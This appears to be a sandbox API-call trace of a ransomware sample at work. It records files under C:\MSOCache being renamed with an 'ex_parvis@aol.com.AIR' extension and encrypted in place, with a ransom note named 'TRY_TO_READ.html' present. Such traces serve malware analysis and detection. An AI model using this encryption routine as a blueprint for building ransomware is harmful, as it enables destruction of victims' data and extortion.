	[0067.439] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5846f0 | out: hHeap=0x540000) returned 1
	[0067.439] GetLastError () returned 0x0
	[0067.439] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0xc0) returned 0x5db0d8
	[0067.439] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x588ef8 | out: hHeap=0x540000) returned 1
	[0067.439] GetLastError () returned 0x0
	[0067.439] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x30) returned 0x583950
	[0067.439] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x30) returned 0x583918
	[0067.439] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x5846f0
	[0067.439] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5846f0 | out: hHeap=0x540000) returned 1
	[0067.439] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x583918 | out: hHeap=0x540000) returned 1
	[0067.439] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x583950 | out: hHeap=0x540000) returned 1
	[0067.439] FindNextFileW (in: hFindFile=0x575960, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xc9e79670, ftCreationTime.dwHighDateTime=0x1d5956c, ftLastAccessTime.dwLowDateTime=0xc9e79670, ftLastAccessTime.dwHighDateTime=0x1d5956c, ftLastWriteTime.dwLowDateTime=0xc9e79670, ftLastWriteTime.dwHighDateTime=0x1d5956c, nFileSizeHigh=0x0, nFileSizeLow=0x5bb, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TRY_TO_READ.html", cAlternateFileName="TRY_TO~1.HTM")) returned 0
	[0067.439] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0xa0) returned 0x5db2f0
	[0067.439] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x100) returned 0x5b8460
	[0067.439] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x8) returned 0x5967c0
	[0067.439] CryptGenRandom (in: hProv=0x588c50, dwLen=0x20, pbBuffer=0x5b8460 | out: pbBuffer=0x5b8460) returned 1
	[0067.439] CryptGenRandom (in: hProv=0x588c50, dwLen=0x8, pbBuffer=0x5967c0 | out: pbBuffer=0x5967c0) returned 1
	[0067.439] SetFileAttributesW (lpFileName="C:\\\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\Setup.xml", dwFileAttributes=0x80) returned 1
	[0067.440] lstrlenW (lpString="C:\\\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 73
	[0067.440] GetProcessHeap () returned 0x540000
	[0067.440] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0xf8) returned 0x5db398
	[0067.441] lstrcpyW (in: lpString1=0x5db398, lpString2="C:\\\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\Setup.xml" | out: lpString1="C:\\\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\Setup.xml") returned="C:\\\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\Setup.xml"
	[0067.441] lstrcatW (in: lpString1="C:\\\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\Setup.xml", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\Setup.xml.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\Setup.xml.12781717671972518758.ex_parvis@aol.com.AIR"
	[0067.441] MoveFileExW (lpExistingFileName="C:\\\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-0019-0409-1000-0000000ff1ce}-c\\setup.xml"), lpNewFileName="C:\\\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\Setup.xml.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\msocache\\all users\\{90140000-0019-0409-1000-0000000ff1ce}-c\\setup.xml.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1
	[0067.466] CreateFileW (lpFileName="C:\\\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\Setup.xml.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\msocache\\all users\\{90140000-0019-0409-1000-0000000ff1ce}-c\\setup.xml.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x464
	[0067.466] GetProcessHeap () returned 0x540000
	[0067.466] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5db398 | out: hHeap=0x540000) returned 1
	[0067.466] GetFileSizeEx (in: hFile=0x464, lpFileSize=0x3a1f73c | out: lpFileSize=0x3a1f73c*=1608) returned 1
	[0067.466] SetFilePointer (in: hFile=0x464, lDistanceToMove=0, lpDistanceToMoveHigh=0x3a1f758*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x3a1f758*=0) returned 0x648
	[0067.466] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x3a1f774*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x3a1f774*=0x100) returned 1
	[0067.466] GetProcessHeap () returned 0x540000
	[0067.466] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x8, Size=0x100) returned 0x5b8568
	[0067.466] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5b8568*, pdwDataLen=0x3a1f764*=0x20, dwBufLen=0x100 | out: pbData=0x5b8568*, pdwDataLen=0x3a1f764*=0x100) returned 1
	[0067.466] WriteFile (in: hFile=0x464, lpBuffer=0x5b8568*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5b8568*, lpNumberOfBytesWritten=0x3a1f778*=0x100, lpOverlapped=0x0) returned 1
	[0067.468] WriteFile (in: hFile=0x464, lpBuffer=0x5967c0*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5967c0*, lpNumberOfBytesWritten=0x3a1f778*=0x8, lpOverlapped=0x0) returned 1
	[0067.468] WriteFile (in: hFile=0x464, lpBuffer=0x5967c0*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5967c0*, lpNumberOfBytesWritten=0x3a1f778*=0x4, lpOverlapped=0x0) returned 1
	[0067.468] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x648) returned 0x5db398
	[0067.468] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x648) returned 0x5db9e8
	[0067.468] SetFilePointer (in: hFile=0x464, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0
	[0067.468] ReadFile (in: hFile=0x464, lpBuffer=0x5db398, nNumberOfBytesToRead=0x648, lpNumberOfBytesRead=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5db398*, lpNumberOfBytesRead=0x3a1f778*=0x648, lpOverlapped=0x0) returned 1
	[0067.468] SetFilePointer (in: hFile=0x464, lDistanceToMove=-1608, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0
	[0067.468] WriteFile (in: hFile=0x464, lpBuffer=0x5db9e8*, nNumberOfBytesToWrite=0x648, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5db9e8*, lpNumberOfBytesWritten=0x3a1f778*=0x648, lpOverlapped=0x0) returned 1
	[0067.468] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5db398 | out: hHeap=0x540000) returned 1
	[0067.468] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5db9e8 | out: hHeap=0x540000) returned 1
	[0067.468] CloseHandle (hObject=0x464) returned 1
	[0067.469] GetProcessHeap () returned 0x540000
	[0067.469] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5b8568 | out: hHeap=0x540000) returned 1
	[0067.469] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5b8460 | out: hHeap=0x540000) returned 1
	[0067.469] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5967c0 | out: hHeap=0x540000) returned 1
	[0067.469] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5db2f0 | out: hHeap=0x540000) returned 1
	[0067.469] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5db248 | out: hHeap=0x540000) returned 1
	[0067.469] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0xa0) returned 0x5db248
	[0067.469] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x100) returned 0x5b8460
	[0067.469] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x8) returned 0x5967c0
	[0067.469] CryptGenRandom (in: hProv=0x588c50, dwLen=0x20, pbBuffer=0x5b8460 | out: pbBuffer=0x5b8460) returned 1
	[0067.469] CryptGenRandom (in: hProv=0x588c50, dwLen=0x8, pbBuffer=0x5967c0 | out: pbBuffer=0x5967c0) returned 1
	[0067.469] SetFileAttributesW (lpFileName="C:\\\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PubLR.cab", dwFileAttributes=0x80) returned 1
	[0067.470] lstrlenW (lpString="C:\\\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PubLR.cab") returned 73
	[0067.470] GetProcessHeap () returned 0x540000
	[0067.470] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0xf8) returned 0x5db2f0
	[0067.470] lstrcpyW (in: lpString1=0x5db2f0, lpString2="C:\\\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PubLR.cab" | out: lpString1="C:\\\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PubLR.cab") returned="C:\\\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PubLR.cab"
	[0067.470] lstrcatW (in: lpString1="C:\\\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PubLR.cab", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PubLR.cab.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PubLR.cab.12781717671972518758.ex_parvis@aol.com.AIR"
	[0067.470] MoveFileExW (lpExistingFileName="C:\\\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PubLR.cab" (normalized: "c:\\msocache\\all users\\{90140000-0019-0409-1000-0000000ff1ce}-c\\publr.cab"), lpNewFileName="C:\\\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PubLR.cab.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\msocache\\all users\\{90140000-0019-0409-1000-0000000ff1ce}-c\\publr.cab.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1
	[0067.472] CreateFileW (lpFileName="C:\\\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PubLR.cab.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\msocache\\all users\\{90140000-0019-0409-1000-0000000ff1ce}-c\\publr.cab.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x464
	[0067.472] GetProcessHeap () returned 0x540000
	[0067.472] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5db2f0 | out: hHeap=0x540000) returned 1
	[0067.472] GetFileSizeEx (in: hFile=0x464, lpFileSize=0x3a1f73c | out: lpFileSize=0x3a1f73c*=9958388) returned 1
	[0067.472] SetFilePointer (in: hFile=0x464, lDistanceToMove=0, lpDistanceToMoveHigh=0x3a1f758*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x3a1f758*=0) returned 0x97f3f4
	[0067.472] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x3a1f774*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x3a1f774*=0x100) returned 1
	[0067.473] GetProcessHeap () returned 0x540000
	[0067.473] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x8, Size=0x100) returned 0x5b8568
	[0067.473] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5b8568*, pdwDataLen=0x3a1f764*=0x20, dwBufLen=0x100 | out: pbData=0x5b8568*, pdwDataLen=0x3a1f764*=0x100) returned 1
	[0067.473] WriteFile (in: hFile=0x464, lpBuffer=0x5b8568*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5b8568*, lpNumberOfBytesWritten=0x3a1f778*=0x100, lpOverlapped=0x0) returned 1
	[0067.475] WriteFile (in: hFile=0x464, lpBuffer=0x5967c0*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5967c0*, lpNumberOfBytesWritten=0x3a1f778*=0x8, lpOverlapped=0x0) returned 1
	[0067.475] WriteFile (in: hFile=0x464, lpBuffer=0x5967c0*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5967c0*, lpNumberOfBytesWritten=0x3a1f778*=0x4, lpOverlapped=0x0) returned 1
	[0067.475] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x97f3f4) returned 0x3a20020
	[0067.475] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x97f3f4) returned 0x43a0020
	[0067.476] SetFilePointer (in: hFile=0x464, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0
	[0067.476] ReadFile (in: hFile=0x464, lpBuffer=0x3a20020, nNumberOfBytesToRead=0x97f3f4, lpNumberOfBytesRead=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x3a20020*, lpNumberOfBytesRead=0x3a1f778*=0x97f3f4, lpOverlapped=0x0) returned 1
	[0068.071] CryptGenRandom (in: hProv=0x588c50, dwLen=0x20, pbBuffer=0x5b8460 | out: pbBuffer=0x5b8460) returned 1
	[0068.071] CryptGenRandom (in: hProv=0x588c50, dwLen=0x8, pbBuffer=0x5967c0 | out: pbBuffer=0x5967c0) returned 1
	[0068.071] SetFileAttributesW (lpFileName="C:\\\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.xml", dwFileAttributes=0x80) returned 1
	[0068.074] lstrlenW (lpString="C:\\\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.xml") returned 80
	[0068.074] GetProcessHeap () returned 0x540000
	[0068.074] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x106) returned 0x5db1a0
	[0068.074] lstrcpyW (in: lpString1=0x5db1a0, lpString2="C:\\\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.xml" | out: lpString1="C:\\\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.xml") returned="C:\\\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.xml"
	[0068.074] lstrcatW (in: lpString1="C:\\\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.xml", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.xml.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.xml.12781717671972518758.ex_parvis@aol.com.AIR"
	[0068.074] MoveFileExW (lpExistingFileName="C:\\\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-0019-0409-1000-0000000ff1ce}-c\\publishermui.xml"), lpNewFileName="C:\\\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.xml.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\msocache\\all users\\{90140000-0019-0409-1000-0000000ff1ce}-c\\publishermui.xml.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1
	[0068.078] CreateFileW (lpFileName="C:\\\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.xml.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\msocache\\all users\\{90140000-0019-0409-1000-0000000ff1ce}-c\\publishermui.xml.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x464
	[0068.078] GetProcessHeap () returned 0x540000
	[0068.078] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5db1a0 | out: hHeap=0x540000) returned 1
	[0068.078] GetFileSizeEx (in: hFile=0x464, lpFileSize=0x3a1f73c | out: lpFileSize=0x3a1f73c*=1450) returned 1
	[0068.078] SetFilePointer (in: hFile=0x464, lDistanceToMove=0, lpDistanceToMoveHigh=0x3a1f758*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x3a1f758*=0) returned 0x5aa
	[0068.078] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x3a1f774*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x3a1f774*=0x100) returned 1
	[0068.078] GetProcessHeap () returned 0x540000
	[0068.078] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x8, Size=0x100) returned 0x5b8568
	[0068.078] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5b8568*, pdwDataLen=0x3a1f764*=0x20, dwBufLen=0x100 | out: pbData=0x5b8568*, pdwDataLen=0x3a1f764*=0x100) returned 1
	[0068.079] WriteFile (in: hFile=0x464, lpBuffer=0x5b8568*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5b8568*, lpNumberOfBytesWritten=0x3a1f778*=0x100, lpOverlapped=0x0) returned 1
	[0068.080] WriteFile (in: hFile=0x464, lpBuffer=0x5967c0*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5967c0*, lpNumberOfBytesWritten=0x3a1f778*=0x8, lpOverlapped=0x0) returned 1
	[0068.081] WriteFile (in: hFile=0x464, lpBuffer=0x5967c0*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5967c0*, lpNumberOfBytesWritten=0x3a1f778*=0x4, lpOverlapped=0x0) returned 1
	[0068.081] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x5aa) returned 0x5db1a0
	[0068.081] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x5aa) returned 0x5db758
	[0068.081] SetFilePointer (in: hFile=0x464, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0
	[0068.081] ReadFile (in: hFile=0x464, lpBuffer=0x5db1a0, nNumberOfBytesToRead=0x5aa, lpNumberOfBytesRead=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5db1a0*, lpNumberOfBytesRead=0x3a1f778*=0x5aa, lpOverlapped=0x0) returned 1
	[0068.081] SetFilePointer (in: hFile=0x464, lDistanceToMove=-1450, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0
	[0068.081] WriteFile (in: hFile=0x464, lpBuffer=0x5db758*, nNumberOfBytesToWrite=0x5aa, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5db758*, lpNumberOfBytesWritten=0x3a1f778*=0x5aa, lpOverlapped=0x0) returned 1
	[0068.081] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5db1a0 | out: hHeap=0x540000) returned 1
	[0068.081] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5db758 | out: hHeap=0x540000) returned 1
	[0068.081] CloseHandle (hObject=0x464) returned 1
	[0068.083] GetProcessHeap () returned 0x540000
	[0068.083] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5b8568 | out: hHeap=0x540000) returned 1
	[0068.083] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5b8460 | out: hHeap=0x540000) returned 1
	[0068.083] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5967c0 | out: hHeap=0x540000) returned 1
	[0068.083] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x598df8 | out: hHeap=0x540000) returned 1
	[0068.083] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x598d40 | out: hHeap=0x540000) returned 1
	[0068.083] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0xb0) returned 0x598d40
	[0068.083] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x100) returned 0x5b8460
	[0068.083] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x8) returned 0x5967c0
	[0068.083] CryptGenRandom (in: hProv=0x588c50, dwLen=0x20, pbBuffer=0x5b8460 | out: pbBuffer=0x5b8460) returned 1
	[0068.083] CryptGenRandom (in: hProv=0x588c50, dwLen=0x8, pbBuffer=0x5967c0 | out: pbBuffer=0x5967c0) returned 1
	[0068.083] SetFileAttributesW (lpFileName="C:\\\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.msi", dwFileAttributes=0x80) returned 1
	[0068.083] lstrlenW (lpString="C:\\\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.msi") returned 80
	[0068.083] GetProcessHeap () returned 0x540000
	[0068.083] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x106) returned 0x5db1a0
	[0068.084] lstrcpyW (in: lpString1=0x5db1a0, lpString2="C:\\\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.msi" | out: lpString1="C:\\\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.msi") returned="C:\\\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.msi"
	[0068.084] lstrcatW (in: lpString1="C:\\\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.msi", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.msi.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.msi.12781717671972518758.ex_parvis@aol.com.AIR"
	[0068.084] MoveFileExW (lpExistingFileName="C:\\\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.msi" (normalized: "c:\\msocache\\all users\\{90140000-0019-0409-1000-0000000ff1ce}-c\\publishermui.msi"), lpNewFileName="C:\\\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.msi.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\msocache\\all users\\{90140000-0019-0409-1000-0000000ff1ce}-c\\publishermui.msi.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1
	[0068.086] CreateFileW (lpFileName="C:\\\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.msi.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\msocache\\all users\\{90140000-0019-0409-1000-0000000ff1ce}-c\\publishermui.msi.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x464
	[0068.086] GetProcessHeap () returned 0x540000
	[0068.086] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5db1a0 | out: hHeap=0x540000) returned 1
	[0068.086] GetFileSizeEx (in: hFile=0x464, lpFileSize=0x3a1f73c | out: lpFileSize=0x3a1f73c*=2513920) returned 1
	[0068.086] SetFilePointer (in: hFile=0x464, lDistanceToMove=0, lpDistanceToMoveHigh=0x3a1f758*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x3a1f758*=0) returned 0x265c00
	[0068.086] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x3a1f774*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x3a1f774*=0x100) returned 1
	[0068.086] GetProcessHeap () returned 0x540000
	[0068.086] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x8, Size=0x100) returned 0x5b8568
	[0068.086] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5b8568*, pdwDataLen=0x3a1f764*=0x20, dwBufLen=0x100 | out: pbData=0x5b8568*, pdwDataLen=0x3a1f764*=0x100) returned 1
	[0068.086] WriteFile (in: hFile=0x464, lpBuffer=0x5b8568*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5b8568*, lpNumberOfBytesWritten=0x3a1f778*=0x100, lpOverlapped=0x0) returned 1
	[0068.088] WriteFile (in: hFile=0x464, lpBuffer=0x5967c0*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5967c0*, lpNumberOfBytesWritten=0x3a1f778*=0x8, lpOverlapped=0x0) returned 1
	[0068.088] WriteFile (in: hFile=0x464, lpBuffer=0x5967c0*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5967c0*, lpNumberOfBytesWritten=0x3a1f778*=0x4, lpOverlapped=0x0) returned 1
	[0068.088] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x265c00) returned 0x3a20020
	[0068.089] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x265c00) returned 0x3c90020
	[0068.089] SetFilePointer (in: hFile=0x464, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0
	[0068.089] ReadFile (in: hFile=0x464, lpBuffer=0x3a20020, nNumberOfBytesToRead=0x265c00, lpNumberOfBytesRead=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x3a20020*, lpNumberOfBytesRead=0x3a1f778*=0x265c00, lpOverlapped=0x0) returned 1
	[0068.229] FindFirstFileW (in: lpFileName="C:\\\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\*", lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xee829690, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xc9e79670, ftLastAccessTime.dwHighDateTime=0x1d5956c, ftLastWriteTime.dwLowDateTime=0xc9e79670, ftLastWriteTime.dwHighDateTime=0x1d5956c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5da0f0
	[0068.229] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5db0d8 | out: hHeap=0x540000) returned 1
	[0068.229] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x5846f0
